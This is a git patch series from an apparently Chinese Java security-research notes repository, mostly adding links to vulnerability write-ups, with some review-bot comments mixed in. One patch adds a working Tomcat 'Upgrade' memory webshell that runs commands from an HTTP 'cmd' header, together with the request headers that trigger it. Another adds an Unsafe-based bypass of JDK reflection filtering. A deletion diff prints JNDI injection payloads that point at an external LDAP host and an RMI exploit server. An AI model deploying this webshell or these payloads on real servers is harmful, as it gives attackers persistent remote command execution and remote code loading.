--git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 25d842d..0b18a57 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -160,3 +160,4 @@ + 2022/09/17 [JAVA反序列化中 RMI JRMP 以及JNDI多种利用方式详解](https://mp.weixin.qq.com/s/tAPCzt6Saq5q7W0P7kBdJg) + 2022/09/19 [冰蝎v4.0传输协议详解](https://mp.weixin.qq.com/s/EwY8if6ed_hZ3nQBiC3o7A) + 2022/09/20 [CVE-2022-26377: Apache HTTPd AJP Request Smuggling](http://noahblog.360.cn/apache-httpd-ajp-request-smuggling/) **好牛皮啊** ++ 2022/09/23 [cve-2010-4452 codebase 和code标签属性未检测同源策略导致任意代码执行漏洞](https://blog.csdn.net/instruder/article/details/7730905) **学习** From 69cdaa189e2a401161c90c2efedf7332f94063fe Mon Sep 17 00:00:00 2001 
From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Fri, 23 Sep 2022 23:55:38 +0800 Subject: [PATCH 124/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 0b18a57..7c01619 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -161,3 +161,4 @@ + 2022/09/19 [冰蝎v4.0传输协议详解](https://mp.weixin.qq.com/s/EwY8if6ed_hZ3nQBiC3o7A) + 2022/09/20 [CVE-2022-26377: Apache HTTPd AJP Request Smuggling](http://noahblog.360.cn/apache-httpd-ajp-request-smuggling/) **好牛皮啊** + 2022/09/23 [cve-2010-4452 codebase 和code标签属性未检测同源策略导致任意代码执行漏洞](https://blog.csdn.net/instruder/article/details/7730905) **学习** ++ 2022/09/23 [Java运行代码的效率怎么提高](https://blog.csdn.net/qf2019/article/details/109351547) [JAVA实现大文件多线程下载,提速30倍](https://blog.csdn.net/qq_19749625/article/details/120009749) **java效率提高** From 92683e32d154813cc5b117fd4e73d8533c292f82 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Mon, 26 Sep 2022 13:22:52 +0800 Subject: [PATCH 125/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 7c01619..4b5decd 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -162,3 +162,4 @@ + 2022/09/20 [CVE-2022-26377: Apache HTTPd AJP Request Smuggling](http://noahblog.360.cn/apache-httpd-ajp-request-smuggling/) **好牛皮啊** + 2022/09/23 [cve-2010-4452 codebase 和code标签属性未检测同源策略导致任意代码执行漏洞](https://blog.csdn.net/instruder/article/details/7730905) **学习** + 2022/09/23 [Java运行代码的效率怎么提高](https://blog.csdn.net/qf2019/article/details/109351547) [JAVA实现大文件多线程下载,提速30倍](https://blog.csdn.net/qq_19749625/article/details/120009749) **java效率提高** ++ 2022/09/26 [一次老版本jboss反序列化漏洞的利用分析](https://mp.weixin.qq.com/s/7oyRYlNUJ4neAdDRkxL2Rg) **低版本的jboss 重挖,不错** From 7bcef03b26b097d9127ca1c30aad7bcb92ea5f2d Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Mon, 26 Sep 2022 21:43:07 +0800 Subject: [PATCH 126/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 4b5decd..0472cfa 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -163,3 +163,4 @@ + 2022/09/23 [cve-2010-4452 codebase 和code标签属性未检测同源策略导致任意代码执行漏洞](https://blog.csdn.net/instruder/article/details/7730905) **学习** + 2022/09/23 [Java运行代码的效率怎么提高](https://blog.csdn.net/qf2019/article/details/109351547) [JAVA实现大文件多线程下载,提速30倍](https://blog.csdn.net/qq_19749625/article/details/120009749) **java效率提高** + 2022/09/26 [一次老版本jboss反序列化漏洞的利用分析](https://mp.weixin.qq.com/s/7oyRYlNUJ4neAdDRkxL2Rg) **低版本的jboss 重挖,不错** ++ 2022/09/26 [CS反制之批量伪装上线](https://forum.butian.net/share/708) **思路不错。** From 4e56cffcd809587ee0af6bef615538f7ae9c04ea Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Mon, 26 Sep 2022 21:52:27 +0800 Subject: [PATCH 127/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) 
diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 0472cfa..83b5ca2 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -164,3 +164,4 @@ + 2022/09/23 [Java运行代码的效率怎么提高](https://blog.csdn.net/qf2019/article/details/109351547) [JAVA实现大文件多线程下载,提速30倍](https://blog.csdn.net/qq_19749625/article/details/120009749) **java效率提高** + 2022/09/26 [一次老版本jboss反序列化漏洞的利用分析](https://mp.weixin.qq.com/s/7oyRYlNUJ4neAdDRkxL2Rg) **低版本的jboss 重挖,不错** + 2022/09/26 [CS反制之批量伪装上线](https://forum.butian.net/share/708) **思路不错。** ++ 2022/09/26 [浅谈JFinal的DenyAccessJsp绕过](https://forum.butian.net/share/1899) **路径绕过url编码** From e0008a4e09a2b796f8e8a80c8cc61e0a63743879 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Thu, 29 Sep 2022 14:24:29 +0800 Subject: [PATCH 128/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 83b5ca2..bfcb129 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -165,3 +165,4 @@ + 2022/09/26 [一次老版本jboss反序列化漏洞的利用分析](https://mp.weixin.qq.com/s/7oyRYlNUJ4neAdDRkxL2Rg) **低版本的jboss 重挖,不错** + 2022/09/26 [CS反制之批量伪装上线](https://forum.butian.net/share/708) **思路不错。** + 2022/09/26 [浅谈JFinal的DenyAccessJsp绕过](https://forum.butian.net/share/1899) **路径绕过url编码** ++ 2022/09/29 [TCTF 2019 线上赛 web 题 writeup](https://www.k0rz3n.com/2019/04/04/TCTF%202019%20%E7%BA%BF%E4%B8%8A%E8%B5%9B%20web%20%E9%A2%98%20writeup/) [在Java EE Servers环境下利用Jolokia Agent漏洞](https://www.freebuf.com/vuls/166695.html) From f68e12bfebc19e66aa810baddf4b01c788f00334 Mon Sep 17 00:00:00 2001 
From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Thu, 29 Sep 2022 16:43:40 +0800 Subject: [PATCH 129/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index bfcb129..2bec876 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -166,3 +166,4 @@ + 2022/09/26 [CS反制之批量伪装上线](https://forum.butian.net/share/708) **思路不错。** + 2022/09/26 [浅谈JFinal的DenyAccessJsp绕过](https://forum.butian.net/share/1899) **路径绕过url编码** + 2022/09/29 [TCTF 2019 线上赛 web 题 writeup](https://www.k0rz3n.com/2019/04/04/TCTF%202019%20%E7%BA%BF%E4%B8%8A%E8%B5%9B%20web%20%E9%A2%98%20writeup/) [在Java EE Servers环境下利用Jolokia Agent漏洞](https://www.freebuf.com/vuls/166695.html) ++ 2022/9/29 [从JDBC attack到detectCustomCollations利用范围扩展](https://xz.aliyun.com/t/11610) **扩展思路** From df9e765c02fd05924778fa091965a139e8dfa2d6 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Tue, 4 Oct 2022 18:18:28 +0800 Subject: [PATCH 130/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 2bec876..61e5771 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -167,3 +167,4 @@ + 2022/09/26 [浅谈JFinal的DenyAccessJsp绕过](https://forum.butian.net/share/1899) **路径绕过url编码** + 2022/09/29 [TCTF 2019 线上赛 web 题 writeup](https://www.k0rz3n.com/2019/04/04/TCTF%202019%20%E7%BA%BF%E4%B8%8A%E8%B5%9B%20web%20%E9%A2%98%20writeup/) [在Java EE Servers环境下利用Jolokia Agent漏洞](https://www.freebuf.com/vuls/166695.html) + 2022/9/29 [从JDBC attack到detectCustomCollations利用范围扩展](https://xz.aliyun.com/t/11610) **扩展思路** ++ 2022/10/04 [为什么预编译可以防止sql注入](https://m.php.cn/faq/418626.html) **预编译可以防止sql注入的原因:允许数据库做参数化查询。在使用参数化查询的情况下,数据库不会将参数的内容视为SQL执行的一部分,而是作为一个字段的属性值来处理,这样就算参数中包含破环性语句(or ‘1=1’)也不会被执行。** From f22f680cf2aee58989104c6b2d2c4615e6475e21 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Wed, 5 Oct 2022 17:10:29 +0800 Subject: [PATCH 131/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 61e5771..50449d7 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -168,3 +168,4 @@ + 2022/09/29 [TCTF 2019 线上赛 web 题 writeup](https://www.k0rz3n.com/2019/04/04/TCTF%202019%20%E7%BA%BF%E4%B8%8A%E8%B5%9B%20web%20%E9%A2%98%20writeup/) [在Java EE Servers环境下利用Jolokia Agent漏洞](https://www.freebuf.com/vuls/166695.html) + 2022/9/29 [从JDBC attack到detectCustomCollations利用范围扩展](https://xz.aliyun.com/t/11610) **扩展思路** + 2022/10/04 [为什么预编译可以防止sql注入](https://m.php.cn/faq/418626.html) **预编译可以防止sql注入的原因:允许数据库做参数化查询。在使用参数化查询的情况下,数据库不会将参数的内容视为SQL执行的一部分,而是作为一个字段的属性值来处理,这样就算参数中包含破环性语句(or ‘1=1’)也不会被执行。** ++ 2022/10/05 [JavaMelody 漏洞](https://mp.weixin.qq.com/s?__biz=MzU1OTU3ODk0OQ==&mid=2247484382&idx=1&sn=bb8b97a74d99a5c361db431898a953d9&chksm=fc1469f4cb63e0e261e53faa8728ff57c72f5694034dda028d08904fe775fa1654f82cb690aa&scene=178&cur_album_id=2327370482917965825#rd) From f4571ad0e360dbe2657a9d39c03b011de1313307 Mon Sep 17 00:00:00 2001 
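Review bot: in PATCH 129/332 (java日常/Readme.md), the added entry is dated `2022/9/29` while the entry directly above it and the other visible entries use a zero-padded month (`2022/09/29`). Suggest `2022/09/29` so the list stays consistent and searchable by date string.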
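Review bot: in PATCH 130/332 (java日常/Readme.md), the bold summary on the 2022/10/04 entry writes `破环性语句` where `破坏性语句` is meant, and the example `(or ‘1=1’)` uses typographic quotes that are not SQL string delimiters. Suggest fixing the character and writing the example in backticks with ASCII quotes. The summary covers only bound parameters; one more sentence saying that identifiers or SQL fragments concatenated into the statement text before it is prepared are not protected would keep readers from over-trusting it.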
From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Wed, 5 Oct 2022 19:58:43 +0800 Subject: [PATCH 132/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 50449d7..b7a23e1 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -169,3 +169,4 @@ + 2022/9/29 [从JDBC attack到detectCustomCollations利用范围扩展](https://xz.aliyun.com/t/11610) **扩展思路** + 2022/10/04 [为什么预编译可以防止sql注入](https://m.php.cn/faq/418626.html) **预编译可以防止sql注入的原因:允许数据库做参数化查询。在使用参数化查询的情况下,数据库不会将参数的内容视为SQL执行的一部分,而是作为一个字段的属性值来处理,这样就算参数中包含破环性语句(or ‘1=1’)也不会被执行。** + 2022/10/05 [JavaMelody 漏洞](https://mp.weixin.qq.com/s?__biz=MzU1OTU3ODk0OQ==&mid=2247484382&idx=1&sn=bb8b97a74d99a5c361db431898a953d9&chksm=fc1469f4cb63e0e261e53faa8728ff57c72f5694034dda028d08904fe775fa1654f82cb690aa&scene=178&cur_album_id=2327370482917965825#rd) ++ 2022/10/05 [一种新的Tomcat内存马 - Upgrade内存马](https://tttang.com/archive/1709) From 351c10a9c59825a0a8150200a6a45494546e42d4 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Wed, 5 Oct 2022 21:23:33 +0800 Subject: [PATCH 133/332] Create Readme.md --- .../Upgrade/Readme.md" | 92 +++++++++++++++++++ 1 file changed, 92 insertions(+) create mode 100644 "java\345\206\205\345\255\230\351\251\254/Upgrade/Readme.md" diff --git "a/java\345\206\205\345\255\230\351\251\254/Upgrade/Readme.md" "b/java\345\206\205\345\255\230\351\251\254/Upgrade/Readme.md" new file mode 100644 index 0000000..66f26f0 --- /dev/null +++ "b/java\345\206\205\345\255\230\351\251\254/Upgrade/Readme.md" 
@@ -0,0 +1,92 @@ +# Upgrade + +参考:https://tttang.com/archive/1709 + +```java +package com.example.demo; + + +import org.apache.catalina.connector.Connector; +import org.apache.catalina.connector.Request; +import org.apache.catalina.connector.RequestFacade; +import org.apache.coyote.Adapter; +import org.apache.coyote.Processor; +import org.apache.coyote.Response; +import org.apache.coyote.UpgradeProtocol; +import org.apache.coyote.http11.AbstractHttp11Protocol; +import org.apache.coyote.http11.upgrade.InternalHttpUpgradeHandler; +import org.apache.tomcat.util.net.SocketWrapperBase; +import org.springframework.web.context.request.RequestContextHolder; +import org.springframework.web.context.request.ServletRequestAttributes; + +import javax.servlet.http.HttpServletRequest; +import java.lang.reflect.Field; +import java.nio.ByteBuffer; +import java.util.HashMap; + +public class UpgradeMemShell implements UpgradeProtocol { + + public UpgradeMemShell() throws Exception{ + HttpServletRequest request = ((ServletRequestAttributes) (RequestContextHolder.currentRequestAttributes())).getRequest(); + RequestFacade rf = (RequestFacade) request; + Field requestField = RequestFacade.class.getDeclaredField("request"); + requestField.setAccessible(true); + Request request1 = (Request) requestField.get(rf); + + Field connector = Request.class.getDeclaredField("connector"); + connector.setAccessible(true); + Connector realConnector = (Connector) connector.get(request1); + + Field protocolHandlerField = Connector.class.getDeclaredField("protocolHandler"); + protocolHandlerField.setAccessible(true); + AbstractHttp11Protocol handler = (AbstractHttp11Protocol) protocolHandlerField.get(realConnector); + + HashMap upgradeProtocols = null; + Field upgradeProtocolsField = AbstractHttp11Protocol.class.getDeclaredField("httpUpgradeProtocols"); + upgradeProtocolsField.setAccessible(true); + upgradeProtocols = (HashMap) upgradeProtocolsField.get(handler); + upgradeProtocols.put("http2.0", this); + 
upgradeProtocolsField.set(handler, upgradeProtocols); + System.out.println("success"); + } + + @Override + public String getHttpUpgradeName(boolean b) { + return null; + } + + @Override + public byte[] getAlpnIdentifier() { + return new byte[0]; + } + + @Override + public String getAlpnName() { + return null; + } + + @Override + public Processor getProcessor(SocketWrapperBase socketWrapperBase, Adapter adapter) { + return null; + } + + @Override + public InternalHttpUpgradeHandler getInternalUpgradeHandler(Adapter adapter, org.apache.coyote.Request request) { + return null; + } + + public boolean accept(org.apache.coyote.Request request) { + System.out.println("MyUpgrade.accept"); + String p = request.getHeader("cmd"); + try { + String[] cmd = System.getProperty("os.name").toLowerCase().contains("windows") ? new String[]{"cmd.exe", "/c", p} : new String[]{"/bin/sh", "-c", p}; + Field response = org.apache.coyote.Request.class.getDeclaredField("response"); + response.setAccessible(true); + Response resp = (Response) response.get(request); + byte[] result = new java.util.Scanner(new ProcessBuilder(cmd).start().getInputStream()).useDelimiter("\\A").next().getBytes(); + resp.doWrite(ByteBuffer.wrap(result)); + } catch (Exception e){} + return false; + } +} +``` From c5700834536524367770e550cb8302226bd601e0 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Wed, 5 Oct 2022 21:24:47 +0800 Subject: [PATCH 134/332] Update Readme.md --- .../Upgrade/Readme.md" | 7 +++++++ 1 file changed, 7 insertions(+) diff --git "a/java\345\206\205\345\255\230\351\251\254/Upgrade/Readme.md" "b/java\345\206\205\345\255\230\351\251\254/Upgrade/Readme.md" index 66f26f0..596af80 100644 --- "a/java\345\206\205\345\255\230\351\251\254/Upgrade/Readme.md" +++ "b/java\345\206\205\345\255\230\351\251\254/Upgrade/Readme.md" 
@@ -90,3 +90,10 @@ public class UpgradeMemShell implements UpgradeProtocol { } } ``` + +使用 +```txt +Upgrade: http2.o +cmd: calc +Connection: Upgrade +``` From 7f0fb3b6b052194022eeb6ce759e6a25b37de401 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Thu, 6 Oct 2022 09:22:54 +0800 Subject: [PATCH 135/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index b7a23e1..b8bc2c3 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -170,3 +170,4 @@ + 2022/10/04 [为什么预编译可以防止sql注入](https://m.php.cn/faq/418626.html) **预编译可以防止sql注入的原因:允许数据库做参数化查询。在使用参数化查询的情况下,数据库不会将参数的内容视为SQL执行的一部分,而是作为一个字段的属性值来处理,这样就算参数中包含破环性语句(or ‘1=1’)也不会被执行。** + 2022/10/05 [JavaMelody 漏洞](https://mp.weixin.qq.com/s?__biz=MzU1OTU3ODk0OQ==&mid=2247484382&idx=1&sn=bb8b97a74d99a5c361db431898a953d9&chksm=fc1469f4cb63e0e261e53faa8728ff57c72f5694034dda028d08904fe775fa1654f82cb690aa&scene=178&cur_album_id=2327370482917965825#rd) + 2022/10/05 [一种新的Tomcat内存马 - Upgrade内存马](https://tttang.com/archive/1709) ++ 2022/10/06 [HSQLDB 安全测试指南](https://b1ue.cn/archives/458.html) From 7c2cd304788cb83e904b43ab71b57d177b0636a7 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Thu, 6 Oct 2022 15:57:15 +0800 Subject: [PATCH 136/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index b8bc2c3..3625db3 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
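Review bot: in PATCH 133/332 (java内存马/Upgrade/Readme.md), the new file is a single `参考` link followed by the whole `UpgradeMemShell` class, with no sentence saying what the constructor changes in the running server or which Tomcat version the reflection on `protocolHandler` and `httpUpgradeProtocols` was checked against. Suggest a short paragraph before the code block stating that the constructor inserts the object into `AbstractHttp11Protocol.httpUpgradeProtocols` under the key `"http2.0"` and that `accept()` passes the `cmd` request header to `ProcessBuilder`, so a reader triaging a host knows that an unexpected entry in that map is the artefact to look for. The empty `catch (Exception e){}` in `accept()` also hides every failure; for notes meant for study, logging the exception would make the behaviour observable.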
@@ -171,3 +171,4 @@ + 2022/10/05 [JavaMelody 漏洞](https://mp.weixin.qq.com/s?__biz=MzU1OTU3ODk0OQ==&mid=2247484382&idx=1&sn=bb8b97a74d99a5c361db431898a953d9&chksm=fc1469f4cb63e0e261e53faa8728ff57c72f5694034dda028d08904fe775fa1654f82cb690aa&scene=178&cur_album_id=2327370482917965825#rd) + 2022/10/05 [一种新的Tomcat内存马 - Upgrade内存马](https://tttang.com/archive/1709) + 2022/10/06 [HSQLDB 安全测试指南](https://b1ue.cn/archives/458.html) ++ 2022/10/06 [Linux terminal/tty/pty and shell](https://kangxiaoning.github.io/post/2021/05/linux-terminal-tty-pty-and-shell/) From 949c1f10328121fdd98f47914c38b567b483bc38 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Thu, 6 Oct 2022 19:26:24 +0800 Subject: [PATCH 137/332] Create Readme.md --- Jdk/Readme.md | 65 +++++++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 65 insertions(+) create mode 100644 Jdk/Readme.md diff --git a/Jdk/Readme.md b/Jdk/Readme.md new file mode 100644 index 0000000..7366273 --- /dev/null +++ b/Jdk/Readme.md 
@@ -0,0 +1,65 @@ +# JDK + +jdk>12不能反射修改下面class的成员。 +![image](https://user-images.githubusercontent.com/63966847/194300821-dd1bf0bc-b5bd-4680-aa35-49a5d4c8adb4.png) +思路是通过unsafe api去修改Reflection类的成员,赋值为null. +```java + +import sun.misc.Unsafe; +import java.io.ByteArrayOutputStream; +import java.io.InputStream; +import java.lang.reflect.Field; +import java.util.HashMap; + +public class bypass { + private static Unsafe getUnsafe() { + Unsafe unsafe = null; + try { + Field field = Unsafe.class.getDeclaredField("theUnsafe"); + field.setAccessible(true); + unsafe = (Unsafe) field.get(null); + } catch (Exception e) { + throw new AssertionError(e); + } + return unsafe; + } + public static byte[] readInputStream(InputStream inputStream) { + byte[] temp = new byte[4096]; + int readOneNum = 0; + ByteArrayOutputStream bos = new ByteArrayOutputStream(); + try { + while ((readOneNum = inputStream.read(temp)) != -1) { + bos.write(temp, 0, readOneNum); + } + inputStream.close(); + }catch (Exception e){ + } + return bos.toByteArray(); + } + + public void bypassReflectionFilter()throws Exception{ + Unsafe unsafe = getUnsafe(); + Class reflectionClass=Class.forName("jdk.internal.reflect.Reflection"); + byte[] classBuffer = readInputStream(reflectionClass.getResourceAsStream("Reflection.class")); + //定义一个类,但不让类加载器知道它。 + Class reflectionAnonymousClass = unsafe.defineAnonymousClass(reflectionClass,classBuffer,null); + + Field fieldFilterMapField=reflectionAnonymousClass.getDeclaredField("fieldFilterMap"); + Field methodFilterMapField=reflectionAnonymousClass.getDeclaredField("methodFilterMap"); + + if(fieldFilterMapField.getType().isAssignableFrom(HashMap.class)){ + unsafe.putObject(reflectionClass,unsafe.staticFieldOffset(fieldFilterMapField),new HashMap()); + } + if(methodFilterMapField.getType().isAssignableFrom(HashMap.class)){ + unsafe.putObject(reflectionClass,unsafe.staticFieldOffset(methodFilterMapField),new HashMap()); + } + } + public static void main(String[] args) throws 
Exception{ + //绕过Java 反射过滤获取ClassLoader私有字段 + //ClassLoader.class.getDeclaredField("parent");//在之前反射会报错 + new bypass().bypassReflectionFilter(); + ClassLoader.class.getDeclaredField("parent");//在之后反射可以bypass + } +} +``` +参考:https://github.com/BeichenDream/Kcon2021Code/blob/master/bypassJdk/JdkSecurityBypass.java From 9cee9aeea248680dbeb95778f4d4a273d11ff974 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Thu, 6 Oct 2022 19:31:45 +0800 Subject: [PATCH 138/332] Update Readme.md --- Jdk/Readme.md | 9 +++++---- 1 file changed, 5 insertions(+), 4 deletions(-) diff --git a/Jdk/Readme.md b/Jdk/Readme.md index 7366273..fd5b9b0 100644 --- a/Jdk/Readme.md +++ b/Jdk/Readme.md @@ -45,14 +45,15 @@ public class bypass { Class reflectionAnonymousClass = unsafe.defineAnonymousClass(reflectionClass,classBuffer,null); Field fieldFilterMapField=reflectionAnonymousClass.getDeclaredField("fieldFilterMap"); - Field methodFilterMapField=reflectionAnonymousClass.getDeclaredField("methodFilterMap"); + //不需要 + //Field methodFilterMapField=reflectionAnonymousClass.getDeclaredField("methodFilterMap"); if(fieldFilterMapField.getType().isAssignableFrom(HashMap.class)){ unsafe.putObject(reflectionClass,unsafe.staticFieldOffset(fieldFilterMapField),new HashMap()); } - if(methodFilterMapField.getType().isAssignableFrom(HashMap.class)){ - unsafe.putObject(reflectionClass,unsafe.staticFieldOffset(methodFilterMapField),new HashMap()); - } + //if(methodFilterMapField.getType().isAssignableFrom(HashMap.class)){ + // unsafe.putObject(reflectionClass,unsafe.staticFieldOffset(methodFilterMapField),new HashMap()); + //} } public static void main(String[] args) throws Exception{ //绕过Java 反射过滤获取ClassLoader私有字段 From 1e6185235b32c44dd0c0db653714953e0f592fc5 Mon Sep 17 00:00:00 2001 
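Review bot: in PATCH 137/332 (Jdk/Readme.md), the sentence above the code says the `Reflection` members are set to null (`赋值为null`), but `bypassReflectionFilter()` writes `new HashMap()` into `fieldFilterMap` and `methodFilterMap` through `unsafe.putObject`. Suggest making the text match the code. The opening claim `jdk>12` is also given without the JDK build the class was run on, and `readInputStream` has an empty `catch (Exception e){}` that returns whatever bytes were read before a failure, so a truncated `Reflection.class` would be handed to `defineAnonymousClass` without any error being reported; rethrowing there would be safer.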
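Review bot: in PATCH 138/332 (Jdk/Readme.md), the `methodFilterMap` lookup and its `if` block are commented out under `//不需要` rather than removed, and the README text is not updated to say that only `fieldFilterMap` is replaced. Suggest deleting the four dead lines and stating in the prose why the method filter does not need to change for the `ClassLoader.class.getDeclaredField("parent")` case in `main`.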
From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Fri, 7 Oct 2022 18:03:47 +0800 Subject: [PATCH 139/332] Create Readme.md --- JVM/Readme.md | 5 +++++ 1 file changed, 5 insertions(+) create mode 100644 JVM/Readme.md diff --git a/JVM/Readme.md b/JVM/Readme.md new file mode 100644 index 0000000..5c66caf --- /dev/null +++ b/JVM/Readme.md @@ -0,0 +1,5 @@ +# JVM + +>自己在学习jvm这本书会记录其中的知识点. + ++ [通过实例一行一行分析JVM的invokespecial和invokevirtual指令](http://wxweven.win/2017/09/15/JVM-invokespecial%E5%92%8Cinvokevirtual/) From 762b14c6e3e27b999147cce0112801ea4af2deae Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Fri, 7 Oct 2022 18:04:22 +0800 Subject: [PATCH 140/332] Delete jndi-gadgets.md --- jndi-gadgets.md | 33 --------------------------------- 1 file changed, 33 deletions(-) delete mode 100644 jndi-gadgets.md diff --git a/jndi-gadgets.md b/jndi-gadgets.md deleted file mode 100644 index bad3ffb..0000000 --- a/jndi-gadgets.md +++ /dev/null 
@@ -1,33 +0,0 @@ -``` -{"@type":"org.apache.shiro.realm.jndi.JndiRealmFactory","jndiNames":["ldap://1.116.136.120:1600/TomcatBypass/TomcatEcho"],"Realms":[""],"a":"a"} - -{"object":["com.mchange.v2.c3p0.JndiRefForwardingDataSource",{"jndiName":"rmi://localhost:8088/Exploit", "loginTimeout":0}]} - -InputStream in = new FileInputStream("C3P0.ser"); -byte[] data = toByteArray(in); -in.close(); -String HexString = bytesToHexString(data, data.length); -String poc = "{\"object\":[\"com.mchange.v2.c3p0.WrapperConnectionPoolDataSource\",{\"userOverridesAsString\":\"HexAsciiSerializedMap:"+ HexString + ";\"}]}"; -System.out.println(poc); - -public static byte[] toByteArray(InputStream in) throws IOException { - byte[] classBytes; - classBytes = new byte[in.available()]; - in.read(classBytes); - in.close(); - return classBytes; -} - -public static String bytesToHexString(byte[] bArray, int length) { - StringBuffer sb = new StringBuffer(length); - for(int i = 0; i < length; ++i) { - String sTemp = Integer.toHexString(255 & bArray[i]); - if (sTemp.length() < 2) { - sb.append(0); - } - - sb.append(sTemp.toUpperCase()); - } - return sb.toString(); -} -``` From 4459f1ac2c68be882cab1c9482f093b18b02b532 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Fri, 7 Oct 2022 18:06:09 +0800 Subject: [PATCH 141/332] Update README.md --- README.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/README.md b/README.md index 7a7d092..afcf094 100644 --- a/README.md +++ b/README.md @@ -22,6 +22,8 @@ + 2022/01/14 [添加了dubbo漏洞分析](Dubbo) 💛 💙 💜 ❤️ 💚 + 2022/01/16 [添加CAS漏洞学习](CAS) 💛 💙 💜 ❤️ 💚 + 2022/03/18 [添加Solr利用exp](Solr) 💛 💙 💜 ❤️ 💚 ++ 2022/10/07 [添加jvm的学习笔记](JVM) 💛 💙 💜 ❤️ 💚 ++ 2022/10/07 [添加JDK里面的trick](JDK) 💛 💙 💜 ❤️ 💚 From 8673174ad5c42e9c1cb265472803a566adf6fcef Mon Sep 17 00:00:00 2001 
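Review bot: the second added entry in `README.md` links to `(JDK)`, but the directory changed earlier in this series is `Jdk/` (`diff --git a/Jdk/Readme.md b/Jdk/Readme.md`), so the relative link will not resolve where paths are case-sensitive. Change the target to `(Jdk)`; the `(JVM)` target does match the `JVM/Readme.md` created in PATCH 139.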
